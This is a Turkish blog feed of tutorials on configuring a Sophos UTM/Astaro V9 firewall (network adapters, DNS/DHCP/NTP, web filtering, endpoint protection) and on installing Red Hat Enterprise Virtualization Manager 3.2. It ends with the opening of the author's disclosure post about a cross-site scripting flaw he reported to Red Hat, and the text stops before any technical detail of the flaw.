Hardware kısmından sunucumuz üzerinde external network adaptörü yapacağımız interface’ imizi seçiyoruz. IPv4 Default GW kutucuğunu işaretliyorum böylelikle gateway’ i modem üzerinden alacaktır. Commentkısmına birçok interface tanımlarsanız yaptığınız işlemi bu interface’ i ne diye kullandığınızı tanımlayan bir özet yazabilirsiniz.

 

Advanced kısmında Hostname kısmına domain’ imizin adını belirtiyoruz. MTU (Maxsimum İletim Birimi) bu  kısımda fiziksel kartın taşıya bileceği maximum veri miktarı’ dır. Aşağıda Protokollerin MTU’ larını sizlere veriyorum.

 

Protocol MTU [HYPERchannel 65,535] [Token Ring(16Mbps)=17,914] [Token Ring(4Mbps)=4,464] [FDDI=4,352] [Ethernet=1,500] [X.25=5,76] [PPP=296]

 

Biz Ethernet teknolojisini kullandığımızdan MTU değiri 1500 olmalıdır. Proxy ARP kutucuğunun amacı ağımızda kullanıcı makinelerimiz, birden fazla ağ geçidine sahip olmayabileceği için bu ağ geçidinin devre dışı kalması durumunda makine,otomatik olarak başka router'a göndermeye başlamayacaktır. Proxy ARP, routing veya bir varsayılan ağ geçidi dahi yapılandırmadan, bir subnet' teki makinelerin, uzak subnet'lere erişmesine yardımcı olur. Eğer yapımız geniş ve bir çok subnet’den oluşuyorsa kutucuğu işaretleyerek yapılandıra bilirsiniz. Displayed max kısmına görülebilicek maxsimum

 

 Asymmetric kutucuğu geniş bant kullanımları için yaptığımız genelde veri gönderim hızını düşük tutup, alış hızını arttırmak suretiyle bağlantıları daha da hızlandırabiliriz. Asymmetric kutucuğunu işaretlerseniz Displayed max kısmına görülebilecek maximum bağlantı hızını ayarlayabilirsiniz.

 

Advanced kısmında şimdilik herhangi bir değişiklik yapmıyorum Save diyerek kartımızı yapılandırarak eklemiş olalım.

 

 

image005

 

 

Network kartımızı ekledik den sonra yuvarlak ile işaretlediğim kısım ilk olarak disable durumda gelecektir. İşaretlediğim butona basarak etkinleştiriyoruz ve IP almasını sağlıyoruz. Gördüğünüz gibi Modemimiz üzerinden IP aldı ve artık çalışır durumda.

 

Evet, arkadaşlar sizlere bu makalemde network adaptörlerimizi nasıl ekleyebileceğimizi ve ayarlarını anlatmaya çalıştım. Bir sonraki makalemde sizlere Network Service yapılandırmasını anlatacağım. Umarım sizlere faydalı olacaktır…

Sophos UTM Astaro V9.0 Firewall Network Service Yapılandırması–Bölüm3

$
0
0

 

 

Merhabalar bu makalemde sizlere Sophos Firewall cihazında Network Servisinin yapılandırmasını anlatacağım. Sophos üzerinde gelen özelliklerden Network Service içeriğinde DNS, DHCP ve NTP Roleleri bulunmaktadır. Bu rollerin neler yaptıklarını genel olarak biliyor. İşte bu makalemizde bu Network Service’ de bu rollerin konfigürasyonunu ve ne özelliklere sahip olacağını sizlere anlatacağım.

 

 

image001

 

 

Sophos Web Management konsolomuzu açıyoruz. Sol tarafta bulunan yönetimsel ayarlarımızdan Network Services’ i genişletiyoruz. Burada gördüğünüz üzere ilk özelliğimiz olan DNS’ e geliyoruz. Eğer yapınızda mevcut bir DNS Server’ ınız varsa bu kısımı tabiki boş bırakabilirsiniz. Fakat ben test ortamında yaptığımdan dolayı ortamımda bir DNS Sunucum mevcut değil. İşte burada DNS Server özelliğini kullanabiliyoruz. Gördüğünüz gibi bir folder ikonu bulunmakta bu folder ikonuna bastığınızda hangi networklerin DNS hizmetinden yararlanmasını istiyorsak bu alana ekliyoruz. Tabi (+) ikonuna bastığınızda da yeni networkler ekleyebilirsiniz. Böylelikle network’ ümüzdeki DNS Server görevinide firewall’ umuz üstlenmiş olacaktır.

 

 

image002

 

 

Forwarders Tabında içeriden gelen DNS isteklerini yapımızda veya dışarıdan ISP hizmetlerini aldığımız  DNS Sunucularımızı ekleyerek ve yönlendirerek daha hızlı çözümleme yapabilmemizi sağlayacaktır. Bunun için daha önceden eklediğiniz DNS’ler var ise gene folder ikonundan ekleyebilirsin veya + işaretine basarak kendinizde ekleyebilirsiniz.

 

 

image003

 

 

Request Routing Tabında DNS sorgularımız nereden dış dünyaya çıkacağını belirliyoruz. Yani modemimiz dışarıya açılan kapımız yani modemiz. Gördüğünüz gibi yapımızda olan mevcut internet bağlantılarımızı buraya ekleyerek dns sorgularımızı internete erişimini sağlayarak çözümlenmesini sağlayacağız.

 

 

image004

 

 

DHCP kısmında gördüğünüz gibi belli başlı yapılandırmalarımız mevcut ilk önce DHCP Server özelliğini sağlayıcak olan network adaptörümüzü belirlemeliyiz. Bunun için Interface kısmında nic’ imizi yani internal adaptörümüzü seçiyoruz. IP adres aralığımızı belirlemek için Range Start ve Range End kısmına dağıtılabilecek IP aralığımızı belirliyoruz. DNS Server kısmında mevcut dns adreslerimizi belirtiyoruz. Clientlara dağıtılın IP’ ler de internete erişim sağlamaları için firewall’ umuzun iç bacak ip adresini ekliyoruz. Domain kısmında mevcut yapımız bir domain yapısıysa etki alanımızı giriyoruz. DHCP Serverda nasıl clientlara verilen her ip adresinin bir mevcut kira süresi varsa burada clientlara verilen ip adresinin kira süresini Lease Time kısmından ayarlıyoruz. Advanced kısmında bulunan ayarları yapılandırabilirsiniz.Enable HTTP Proxy Auto Configuration kutucuğunu işaretleyerek bütün clientlardan gelen bütün internet erişim isteklerini otomatik olarak belirlediğimiz ayarları alacaktır. Clients via DHCP relay agent kutucuğu aslında DHCP Relay Agent farklı bir makale konusu ama kısaca bahsedeyim, DHCP Relay Agent farklı bir subnetteki DHCP Server’dan kendi subnetimizdeki kullanıcılara IP aldırmamızı sağlar. Relay Agent olacak makine bir bilgisayar da olabilir bir Router’da olabilir. Basit olarak DHCP Relay Agent kendi subnet’indeki kullanıcıların DHCP Broadcast’lerini yakalayarak bunları Unicast’e çevirip yetkili DHCP Server’a gönderir. Bunu eğer bir ipsec veya pptp bağlantılarımız var ise işaretlemeliyiz...

 

 

image005

 

 

DHCP de Options Tab’ ında default olarak TFTP bootfile ve TFTP Server ve NTP Time Server disable gelecektir. Biz sonraki özelliğimiz NTP Rolü olduğundan NTP Server özelliğini enable eddiyoruz. NTP (Network Time Protocol) Server’ ın amacı zaman bazli kuralların uygulana bilmesi için gereken bir roldür. Cisco gb. Cihazlarda dahili saat bulunmadığından cihazlar kapatilip açildiginda üzerinde bulunan saati kaybedip varsayilan zaman degerine dönmektedir. İşte bu yüzden cihaz varsayilan degerine döndügü için cihaz üzerinde zaman bazli yazilan kurallar çalisamaz hale gelmekte. Bu yüzden cihazlara harici zaman kaynagi göstermek için cihazlarin zaman ve tarih bilgileri baska bir kaynaktan alabilmeleri saglayan protocol NTP (Network Time Protocol) dir. Bu yüzden aktif ediyoruz.

 

 

image006

 

 

NTP alanına geldiğimizde hangi networklerden NTP Server’ a erişim sağlanacak ise  bu alandan ekleyerek belirlediğimiz networklerdeki cihazların zaman bilgisini alabileceklerdir. Böylelikle yeniden başlatılan üzerinde dahili saat bulunmayan cihazlar kaldıkları yerden devam edebileceklerdir.

 

Sizlere Sophos Astaro Firewall üzerinde Network Services yapılandırmasını anlatmaya çalıştım gelişmiş konfigürasyonlarını daha ileri uygulamalarda nasıl yapılandırılacağına tekrardan değineceğim.

 

Umarım sizlere faydalı olacaktır...

Sophos Astaro V9 Firewall Web Protection Yapılandırması-Bölüm4

$
0
0

 

 

Merhabalar  bu makalemde sizlere Astaro V9 Firewall’ un en önemli özelliklerinden “Web Protection” yapılandırmasını ve nasıl yapılandıracağınızı kısaca bir kaç örnek ile sizlere anlatmaya çalışacağım. Bildiği üzere bizlerin şirketlerimizde uygulamamız gereken en önemli konulardan biride Web & Application Filtering yapmamızdır. İşte Sophos’ un Astaro ürününde web protection’ ın yapılandırmasını yapacağız.

 

 

image001

 

 

Astaro Web Managemen Konsolumuzu açıyoruz. Sol tarafda bulunan yönetimsel araçlar kısmında gördüğünüz üzere Web Protection aracımıza geliyoruz. Burada Web Filtering’ e geliyoruz. Burada Allowed networkskısmında web filtrelemenin hangi networkde uygulanacağını belirliyoruz. Ben clientlarıma web filtreleme uygulayacağımdan dolayı “İnternal(Network)” ümü ekliyorum. Aşağıda gördüğünüz gibi Scan HTTPS (SSL) Traffickutucuğu bulunmaktadır. Bu kutucuk default olarak boş gelmektedir fakat bildiğiniz üzere artık web sitelerine erişirken nasıl http://www.facebook.com diyerek erişim sağlayabiliyorsak https://www.facebook.com yazarakda erişim sağlayabiliyoruz. Tabiki her web sitesini kendi güvenlik politikamız gereği yasaklamak bile HTTPS koyarak clientlar bu filtrelemeri atlatabiliyorlar. İşte bu Scan HTTPS (SSL) Traffic kutucuğunu işaretleyerek clientların HTTPS koyarak girme teşebbüslerinide engellemiş oluruz. Altta bulunan Standard Mode, Transparent Mode ve Full transparent özellikleri başka bir makalemde sizlere uygulamalı olarak anlatacağım. Transparent Mode seçeneğini seçiyoruz. Authentication Mode kısmında Browser’ ı seçiyoruz. Allowed Users\Groups kısmında buraya eklediğiniz kullanıcılar veya gruplar web filtrelemesi uygulanmadan çıkacaklardır Buraya ekleyeceğiniz kişileri ve ya grupları doğru belirlemelisiniz. Örn :  (Domain Admins) gbi. Ben herkeze bu kural geçerli olsun istediğimden bir kişi veya grup belirlemiyorum.

 

 

image002

 

 

Antivirüs/Malware Tabında bulunan Use Antivirus Scanning kutucuğunu işaretleyerek web trafiği üzerinde antivirüs, kötü amaçlı yazılımlar, solucanlar ve download işlemlerini kontrol eder. Tabiki bu olayda iki farklı metot kullanır. Single Scan (Maximum Performance) seçilerek tarama seviyesi yüksek olmayarak performans sağlar. Dual Scan (Maximum Security) seçilerek iki farklı tarama motoru kullanır ve maximum güvenlik sağlar.

 

File Extention Filter kısmında dosyaların uzantılarınada bakarak engellemeler yapabilirsiniz. Default olarak mevcut dosya uzantıları zaten bulunmakta tabi bunlara sizde (+) butonuna gelerek farklı uzantılarda ekleyebilirsiniz.

 

 

image003

 

 

URL Filtering Tabında istediğimiz içerik filtrelemesini burada yapacağız. İlk başta ya burada belirleyeceğimiz kriterlere göre izin vereceğiz yada bloklayacağız bunun için Allow content that does not match the criteria below. yada Block content that does not match the criteria below. Seçeneğini belirliyoruz. Ben burada belirleyeceğim kriterlerde bloklama yapacağımdan Block seçeneğini seçiyorum. Aşağıda bulunan Block these website categories kısmında bloklayacağım web sitelerinin kategorilerini belirliyorum.  Burada bulunan kategorileri kendinize göre belirleye bilirsiniz. Sağ tarafda bulunan Additional URLs/sites to block kısmına hangi kategoriye girdiğini bilmediğiniz veya belirlediğiniz kategoriye izin verdiniz fakat o kategoride bulunan bir web sitesine erişim sağlamasını istemiyorsunuz işte onu bu kısıma girerek engelleye bilir veya ilk başta belirlediğiniz politikaya göre izin verebilirsiniz. Örneğin ben facebook’ un hangi kategoriye girdiğini bilmiyorum bunun için Additional URLs/sites to block kısmına http://www.facebook.com adresini ekliyorum. Yahut tam tersi olarak yasakladığımız bir kategoride erişime izin vermek istediğimiz web sitelerini erişilebilir hala getirmek istiyorsak Always allow these URLs/sites kısmında girebiliriz. Users/Groups allowed to bypass blocking kısmında bu kısıtlamalara dahil edilmeyecek kulanıcı veya grupları buraya ekleyerek kuralları pas geçerek erişim sağlamalarını sağlıyoruz.

 

 

image004

 

 

Belirlediğimiz kuralımızı test etmek için http://www.facebook.com adresine erişim sağlamaya çalıştım ve görüldüğü gibi Content Blocked uyarı ile karşılaştık. Buda içerik filtrelmemizin başladığını gösteriyor.

 

 

image005

 

 

Tabi blokladığımız URL kategorilerinde bazı önemli applicationların otomatik updatelerini çektiği siteleride engellemiş olabiliyoruz bu yüzden applicationlar önemli updateleri web sitelerinden download edemeyecek ve güncellemeleri yapamamaktadır. İşte bu yüzden uygulamaların updateleri çekebileceği web siteleri kısıtlamalardan ayrı tutmamız gerekiyor. Bunun için Exception kısmına geliyoruz. Default olarak gelen Application Update Website ları mevcut işte bu kısımda sizlerinde uygulamaların otomatik updateleri download edebileceği siteleri buraya eklerek filtrelemeden ayrı tutulmasını sağlayabilirsiniz.

 

 

image006

 

 

Artık Application filtrelemesi için Web Protection’ ın altında Application Control’ a geliyoruz. Burada ilk olarak Network Visibility tabına geliyoruz ve aktif ediyoruz. Böylelikle kuralları belirleyebileceğiz.

 

 

image007

 

 

Application Control Rules Tabında New Rule diyerek yeni bir uygulama kuralı oluşturuyorum. Açılan kısımda ilk olarak bu kurala bir isim veriyoruz. Action kısmında izin mi yoksa yasak mı konulacağını belirliyoruz. Ben yasaklıyacağım için Block diyorum. Control by engelliyeceğim bir uygulama olduğundan Applications’ ı seçiyorum. Control these Applicatios kısmında klasör butonuna basarak engelleyeceğim uygulamayı ekliyorum, ben Live Messenger’ ı engelleyeceğim onun için Windows Live’ ı ekliyorum. For kısmında nereden ve nasıl erişimi engelleyebileceğimizi belirliyoruz Any diyerek clientların içeriden hiç bir şekilde erişmelerini engelliyorum.

 

 

image008

 

 

Kendi oturumumu açmaya çalışıyorum fakat açamıyorum. Gördüğünüz gibi bunun gibi birçok application’ ı engelleye bilir veya application’ ın çalışmasını fakat görüşme yapmasını engelleyebilirsiniz bu sizin filtreleme politikanıza kalmış.

 

Evet, arkadaşlar sizlere Sophos Astaro V9 ürününün Web Protection özelliğini nasıl kullanacağınızı ve nasıl yapılandıracağınıza dair bilgi vermeye çalıştım.

 

Umarım sizlere faydalı olacaktır...


Sophos Astaro Endpoint Protection Kurulumu ve Yapılandırması-Bölüm5

$
0
0

 

 

Merhaba bu makalemde sizlere Sophos Astaro V9 Firewall ile birlikte gelen bir diğer önemli özellik olan Sophos Endpoint Protection kurulumunu ve yapılandırılmasını anlatacağım. Bildiğimiz üzere piyasa bulunan bir çok firewall yazılımına özel Endpoint Protection softwareları mevcut. Tabiki her biri birbirine göre oldukça marifetli yazılımlar fakat Sophos bu konuda farkını ortaya koymuş ve diğerlerinden farklı bir çok özelliği kullanıcılarına sunmuş. İşte size bu gelişmiş yazılımın clientlara kurulumunu yapılandırılmasını ve gruplara özel policyler nasıl oluşturabileceğinizi anlatacağım.

 

 

image001

 

 

Web Management konsolumuzu açıyoruz. Sol menümüzde bulunan Endpoint Protection’ a geliyoruz. Default olarak disable durumda gelmektedir bu yüzden Global Tabından Enable ediyoruz.

 

 

image002

 

 

Clientlarımıza kuracağımız agentlarımızı Sophos’ un resmi sitesinden download etmeliyiz. Bunun için bize iki farklı kurulum paketi sunmaktadır. İlki Slim Installation Package, bu pakete sadece kurulum için gereken dosyaları içermektedir. Böylelikle kurulumu yaptıkdan sonra gerken diğer paketleri otomatik olarka çekecektir. İkincisi Full İnstallation Package, bu pakete bütün güvenlik güncellemeleri ve bileşenlerini içeren bir kurulum paketidir. Bu paketleri indirmek için ya Download Slim İnstaller butonuna yada Download Full İnstaller butonuna basarak veya aşalarında bulunan linklerden indirebilirsiniz. Bu paketleri buton ile yada link ile indirdiğinizde aslında burada oluşturulmuş olan link sizin Sophos Astaro ürünüzün belirli olan ID’ si ilen download edilmektedir. Böylelikler agentların kurulu olduğu client bilgisayarları nereye giderlerse gitsinler (örn: Laptop) üzerlerinde bulunan policyler herzaman geçerli ve aktif olmaktadır. Böylelikle real time özelliği aktif durumda olucaktır ve koruma sağlayacaktır.

 

Ben Slim İnstaller Package’ ını indiriyorum...

 

 

image003

 

 

Bu indirdiğiniz paketi kaydet diyerek devam ediyoruz. Clientlarımıza bu indirdiğimiz paketi dağıtacağız.

 

 

image004

 

 

Endpoint Yazılımımızı client’ ımıza kurulumunu gerçekleştiriyoruz. Next diyerek devam ediyoruz.

 

 

image005

 

 

Burada bize kuruluma başlamadan önce 3.party bir antivirüs yazılımı bulunuyorsa kurulumu yapması için daha önceden kurulu olan antivirüs yazılımını kaldırılmasını belirtiyor. Burada bulunan Remove conflicting third party security software kurucuğunu işaretleyerek mevcut olan diğer yazılımları kendisinin kaldırmasını sağlıyoruz, Install diyerek kurulumu başlatıyoruz.

 

 

image006

 

 

Kuruluma başladık Slim paket olduğundan mevcut 6 bileşen ile kurulum yapmakta. Full paketinde 19 bileşen bulunmaktadır. Artık kurulumun tamamlanmasını bekliyoruz.

 

 

image007

 

 

Endpoint Agent kurulumumuzu bitirdik. Finish diyerek Sophos Endpoint Security konsolumuzu görebiliriz.

 

 

image008

 

 

Endpoint Security arayüzümüzü görüyoruz. Burada bulunan iyi özelliklerden biride bizler GPO ile kullanıcılarda yönetdiğimiz Device Controlsözelliğidir. Artık Clientlara uygulanacak policyleri yazmaya başlayabiliriz.

 

 

image009

 

 

Sophos Astaro Web Management konsolumuzu açıyoruz, Endpoint Protection’ a geliyoruz. Gördüğünüz gibi Endpoint Agentımızın kurulu olduğu clientlarımızı görebiliyoruz. Burada şuanda clietımızda oturum açmış kullanıcımızı client pc’ nin şuanda mevcut lokasyonu (Turkey- Istanbul) ve durumunu görebiliyoruz. Bir clientımızda (Alert) durumda olduğunu görüyoruz. Alt kısımda Action Description kısmında bulunan tehdit’ in ne olduğunu görebiliyoruz. Resolve All diyerek virüsü veya malware’ ı temizliyoruz.

 

 

image010

 

 

Artık Clientlarımız için gruplar oluşturarak o gruba dahil olan clientlarımız için policyler oluşturacağız. Bunun için ilk önce Grup oluşturmalıyız. Endpoint ProtectionManage Groups Tabına geliyoruz ve Add Computers Group diyoruz. Oluşturacağımız grubumuza bir isim veriyoruz. Antivirus Policy kısmında Basic Protection’ ı seçiyoruz. Clientlarımızda bulunan aygıtlarıda kontrol edeceğimizden Device policy kısmında Full Access’ i seçiyoruz. Tamper Protection kısmında clientların ayarlarda değişiklik yapmasını engellemek için Enable diyoruz. Computers kısmında bu gruba dahil edeceğimiz Client PC’ lerimizi ekliyoruz ve Save diyerek kaydediyoruz.

 

 

image011

 

 

Advanced Tabına geliyoruz. Burada Değişiklik yapılmasına karşı aktif ettiğimiz Tamper Protection için yönetici olarak bir şifre belirliyoruz ve Apply diyoruz. Default Computers Group kısmında belirlediğimiz Tamper Protection şifremizin otomatik olarak hangi grup’ daki bilgisayarlara eklenecekse o grubu seçiyoruz. Sophos LiveConnect – Registration kısmında ürünümüzün ve agent yüklü pclerimizin kayıt bilgilerinin otomatik tutulan Sophos’ a ait veritabanında bulunan fiş numarasını değiştirmek için Reset Registration Token butonuna basabilirsiniz fakat bu fiş ile kayıt altına alınmasını itiyorum Apply diyerek kayıt ediyoruz.

 

Artık clientlarımızda bulunan Endpoint Agentlarımızda Antivirus Policy’ de Basic Protection olarak belirlediğimiz policy’ mizi oluşturuyoruz. Bunun için Endpoint Protection’ ın altında bulunan Antivirus kısmına geliyoruz burada Policies Tabında Add policy diyoruz. Oluşturacağımız policymize bir isim veriyoruz. On-access scanning kısmında enable yapıyoruz ve taramayı aktif ediyoruz. Automatic Clean Up kısmında enable yapıyoruz ki policy mize göre otomatik temizleme işlemini yapabilsin. Sophos Live Protection kısmında Enable yapıyoruz ve real time korumayı devreye alıyoruz. Suspicious behaviour kısmında clientlarda olan şüpheli durumlarda bildirimleri aktif etmek için Enable diyoruz. Web Protection kısmında web korumasını aktif etmek için Enable ediyoruz. Block malicious sites kutucuğunu işaretliyerek zararlı sitelere erişimi engellemeyi aktif ediyoruz.Download scanning kutucuğunuda işaretleyerek downloadlarda tarama özelliğini aktif ediyoruz. Scheduled scanning kısmında clientlarda taramalarda bir zamanlama ayarlaya bilirsiniz. Policymizi ouşturduk Save diyerek kaydediyoruz.  

 

 

image012

 

 

Endpoint Protection kısmında en başta belirttiğim etkili bir özellik Device Controls’ a geldik. Policies Tabında gördüğünüz üzere iki farklı seçenek bulunmakta Blocked All ve Full Access biz ilk policymiyizi oluştururken Device Policy’ ye Full Access demiştik hatırlarsanız şimdi artık bir device policy oluşturalım. Burada bir çok aygıt yönetimi mevzut görüldüğü gibi. Bunun için Add Policy butonuna geliyoruz.

 

 

image013

 

 

İlk önce bu policymize bir isim veriyoruz. Storage Devices kısmında bulunan Floopy Drive, Optical Drive, Removable Storage ve Encrypted Storage bulunmakta. Ben Floopy sürücüsünü kapatıyorum. Optic sürücümüzü sadece Read Only olmasını istiyorum. Taşınabilir USB bellekleri kullanamabilmelerini istemiyorum onu da kapatıyorum. Aynı şekilde Bitlockerla şifrelenmiş veya encrypt edilmiş taşınabilir bellekleride kullanıma kapatıyorum. Network Devices kısmında Modem olan bizim Network Interface Card’ ımızın ağa bağlanacaklarından dolayı Allowed ediyorum. Taşınabilir Pc’ ler olan Wireless adaptörü bulunuyor bu yüzden farklı networklere bağlanmasını veya farklı bir IP adresini almasını engellemek için wireless’ ı da kapatıyorum. Short Range Devices adından da anlaşıldığı gibi kısa mesafe aygıtları bunlar Bluetooth ve Infraned aynı şekilde bunlarında kullanımı kapatıyorum, Save diyerek policy mi oluşturuyorum.

 

 

image014

 

 

Artık oluşturduğumuz bu Aygıt Kuralını uygulayacağımız clientlarımıza dağıtalım. Bunun için Endpoint Protection’ da Computer Management’ a geliyoruz burada Manage Groups tabına geliyoruz ve daha önce oluşturduğumuz grubumuzu edit leyerek Device Policy kısmında oluşturduğumuz kendi kuralımızı belirtiyoruz ve Sace diyerek kaydediyoruz. Client’ lara policy’ nin uygulanma süresi default olarak 5dk. Dır tabi siz kendinize göre ayarlayabilirsiniz.

 

Evet, arkadaşlar size Sophos Astaro V9 Firewall üzerinde Endpoint Protection özelliğinin nasıl aktif edileceğini agent’ ı nereden download edebileceğimizi, kurulumunu ve yapılandırmasını anlattım. Sophos’ un bu özelliği çok kullanışlı ve gerçektende çok performanslı bir kuruma sağlamaktadır. Tabiki üzerine yazacağınız policyler clientların üzerindeki tehditleri size bilgilendirme e-mail i olarakda iletebilmektedir.

 

Umarım sizlere faydalı olacaktır...

RHEV Manager 3.2 Kurulum ve Cross site script (XSS) Zafiyeti ve Bugfix Update

$
0
0

RHEV ve RHEV-M nedir?

 

RHEV in açılımı “Redhat Enterprise Virtualization” demektir. Redhat tarafından geliştirilmiş bu uygulama sanallaştırma için kullanılmaktadır, piyasadaki vmware, xen gibi düşünebiliriz.

 

RHEV-M ise sanallaştırma ortamımızı yönetmemiz için kullanacağımız bir web ara birimidir, bunu da vmware daki vcenter gibi düşünebiliriz.

 

 1- RHEV-M kurulumu

 

1.1 – Gereksinimler:

 

** Minimum :
A dual core CPU.
4 GB of available system RAM that is not being consumed by existing processes.
25 GB of locally accessible, writeable, disk space.
1 Network Interface Card (NIC) with bandwidth of at least 1 Gbps.

 

** Recommended :
A quad core CPU or multiple dual core CPUs.
16 GB of system RAM.
50 GB of locally accessible, writeable, disk space.
1 Network Interface Card (NIC) with bandwidth of at least 1 Gbps.

 

 1.2 – RHEV-M Administrator Portal Erişim için desteklenen OS ve Browser bilgileri,

 

  • Client

     

    • Windows XP,

       

    • Windows 7 (x86, AMD64 and Intel 64), and

       

    • Windows 2008/R2 (x86, AMD64 and Intel 64).

       

  • Browser

     

    • Internet Explorer 9, and later, on Microsoft Windows is required to access

 

1.3 – RHEV-M User Portal Erişim için desteklenen OS ve Browser bilgileri,

 

  • Client

     

    • Red Hat Enterprise Linux 5.5 (i386, AMD64 and Intel 64)

       

    • Red Hat Enterprise Linux 6.0 (i386, AMD64 and Intel 64)

       

    • Windows XP

       

    • Windows XP Embedded (XPe)

       

    • Windows 7 (x86, AMD64 and Intel 64)

       

    • Windows Embedded Standard 7

       

    • Windows 2008/R2 (x86, AMD64 and Intel 64)

       

    • Windows Embedded Standard 2009

       

    • Red Hat Enterprise Virtualization Certified Linux-based thin clients

       

  • Browser

     

    • Internet Explorer 8, and later, on Microsoft Windows is required to access

       

RHEV-M için kullanacak olduğumuz donanım ve yazılım gereksinimlerimiz hazır ise, RHEV-M kurulumuna geçebiliriz.

 

2 – RHEL 6.4 OS kurulumu:

 

RHEV-M kurulumu için öncelikle RHEL 6.4_x64(Redhat Enterprise Linux) kurulumu yapıyoruz, kurulum esnasında dikkat edilmesi gereken adım, sunucu hostname bilgisi, hostname bilgisi manager, rhevm gibi isimler olmamalıdır. rhevm.kayhankayihan.com şeklinde olmalıdır. rhevm.kayhankayihan.com için sunucu ip adresini gösteren bir dns kaydı olmalıdır, dns kaydı yok ise bile sunucunun hosts dosyasına yazılmalıdır. Rhn_register ile sunucu RHN(redhat network) register edilmelidir.

 

#rhn_register

 

 

 

3 – RHEL Channel Subscription :

 

RHEV-M kurulumu gerçekleştirebilmek için ek subscriptionlara register etmek gerekiyor, register edilmesi gereken channel listesi şu şekilde,

 

  • RHEL Server Supplementary (v. 6 64-bit x86_64) (Channel Details)

     

  • Red Hat Enterprise Virtualization Manager (v.3.2 x86_64) (Channel Details)

     

  • Red Hat JBoss EAP (v 6) for 6Server x86_64

     

 

 

4 – RHEL OS Upgrade :

 

İlgili channelara register edildikten sonra işletim sistemimizi upgrade ediyoruz, en güncel paketleri redhat networkünden çekiyoruz.

 

#yum upgrade –y

 

5 – RHEV-Manager Kurulumu :

 

rhevm-setup paketini rhn den kuruyoruz,

 

#yum install rhevm-setup.noarch -y

 


rhevm-setup komutu ile kurulumu başlatıyoruz.

 

Kurulum esnasında bize bazı sorular soracak, DB, storage tipi v.b. gibi. Aşağıda detayları mevcut. Bu bölümde kullandığınız disk tipi v.b. bilgileri seçebilirsiniz.

 

[root@rhevm ~]# rhevm-setup
Availble memory (1877) is lower then the minimum requirments (4096)
Would you like to proceed? (yes|no): yes
Welcome to RHEV Manager setup utility

 

In order to proceed the installer must stop the ovirt-engine service
Would you like to stop the ovirt-engine service? (yes|no): yes
RHEV Manager uses httpd to proxy requests to the application server.
It looks like the httpd installed locally is being actively used.
The installer can override current configuration .
Alternatively you can use JBoss directly (on ports higher than 1024)
Do you wish to override current httpd configuration and restart the service? ['yes'| 'no']  [yes] : yes
HTTP Port  [80] :
HTTPS Port  [443] :
Host fully qualified domain name. Note: this name should be fully resolvable  [rhevm.endersys.com] :
Enter a password for an internal RHEV Manager administrator user (admin@internal) :


Confirm password :


Organization Name for the Certificate  [endersys.com] :
The default storage type you will be using  ['NFS'| 'FC'| 'ISCSI'| 'POSIXFS']  [NFS] : ISCSI
Enter DB type for installation ['remote'| 'local']  [local] : local
Enter a password for a local RHEV Manager DB admin user (engine) :


Confirm password :


Configure NFS share on this server to be used as an ISO Domain? ['yes'| 'no']  [yes] : yes
Local ISO domain path  [/var/lib/exports/iso] :
Firewall ports need to be opened.
The installer can configure firewall automatically overriding the current configuration. The old configuration will be backed up.
Alternately you can configure the firewall later using an example file.
Which firewall do you wish to configure? ['None'| 'iptables']: None

 

RHEV Manager will be installed using the following configuration:


=================================================================
override-httpd-config:         yes
http-port:                     80
https-port:                    443
host-fqdn:                     rhevm2.endersys.com
auth-pass:                     ********
org-name:                      endersys.com
default-dc-type:               ISCSI
db-remote-install:             local
db-local-pass:                 ********
nfs-mp:                        /var/lib/exports/iso
config-nfs:                    yes
override-firewall:             None
Proceed with the configuration listed above? (yes|no): yes

 

Installing:
Configuring RHEV Manager…                             [ DONE ]
Configuring JVM…                                      [ DONE ]
Creating CA…                                          [ DONE ]
Updating ovirt-engine service…                        [ DONE ]
Setting Database Configuration…                       [ DONE ]
Setting Database Security…                            [ DONE ]
Creating Database…                                    [ DONE ]
Updating the Default Data Center Storage Type…        [ DONE ]
Editing RHEV Manager Configuration…                   [ DONE ]
Editing Postgresql Configuration…                     [ DONE ]
Configuring the Default ISO Domain…                   [ DONE ]
Configuring Firewall…                                 [ DONE ]
Starting ovirt-engine Service…                        [ DONE ]
Configuring HTTPD…                                    [ DONE ]

 

**** Installation completed successfully ******

 

(Please allow RHEV Manager a few moments to start up…..)

 

**** To access RHEV Manager browse to http://rhevm2.endersys.com:80 ****

 

Additional information:


* RHEV Manager CA SSL Certificate SHA1 fingerprint: 70:3B:64:11:6C:09:29:10:64:CD:03:FD:A8:B7:6B:42:13:DA:88:FA
* SSH Public key fingerprint: af:46:59:1c:83:0e:96:c7:7c:25:86:cf:f8:9e:35:72
* A default ISO share has been created on this host.
If IP based access restrictions are required, please edit /var/lib/exports/iso entry in /etc/exports
* RHEV Manager requires the following TCP/IP Incoming ports to be opened on the firewall:
22, 80, 443
* an example of the required configuration for iptables can be found at: /etc/ovirt-engine/iptables.example
* The installation log file is available at: /var/log/ovirt-engine/engine-setup_2013_08_29_13_49_58.log
* Please use the user “admin” and password specified in order to login into RHEV Manager
* To configure additional users, first configure authentication domains using the ‘rhevm-manage-domains’ utility

 

 

 

6 – RHEV OS Upgrade :

 

rhevm-setup ile kurmuş olduğumuz paketleri güncellemek adına son birkez daha işletim sistemimizi update etmekte fayda var.

 

#yum upgrade –y

 

7 – Admin portal erişimi :

 

Kurulumun sonunda da belirtmiş olduğu gibi aşağıdaki URL den RHEV-Manager uygulamasına web üzerinden erişim sağlayabiliriz.

 

8 – RHEV-M Web GUI Image :

 

clip_image002

 

clip_image004

 

clip_image006

 

 

RHEV Manager Cross site script (XSS) Zafiyeti ve Bugfix Update

 

Bu yazımda RHEV Manager da tespit etmiş olduğum Cross site script zafiyeti, zafiyet için yayınlanan bug fix ve zafiyetin nasıl giderildiğinden bahsediyor olacağım. Konu ile ilgili redhat ın yayınlamış olduğu bug fix içeriğine buradan erişebilirsiniz. Bugzilla için buraya tıklayın.

 

NOT: Bug fix içeriğinde gördüğünüz gibi redhat zafiyeti bulan kişiye teşekkür ediyor.(Yani bana ) Bu kültürün ülkemizde de olması gerektiği düşüncesindeyim, Türkiye de zafiyet bildirimi gerçekleştirdiğinizde yanıt bile alamayabiliyorsunuz.

 

Red Hat would like to thank Kayhan KAYIHAN of Endersys A.Ş. for reporting


this issue.

 

 

Şimdi gelelim asıl konuya blogumu takip eden arkadaşların bildiği gibi bir süredir Redhat ın sanallaştırma çözümü olan RHEV ile ilgileniyorum. RHEV ile ilgilendiğim süre içerisinde RHEV in manager uygulamasında bir zafiyet keşfettim ve redhat ile iletişime geçerek durumu raporladım. (2013-07-26)

 

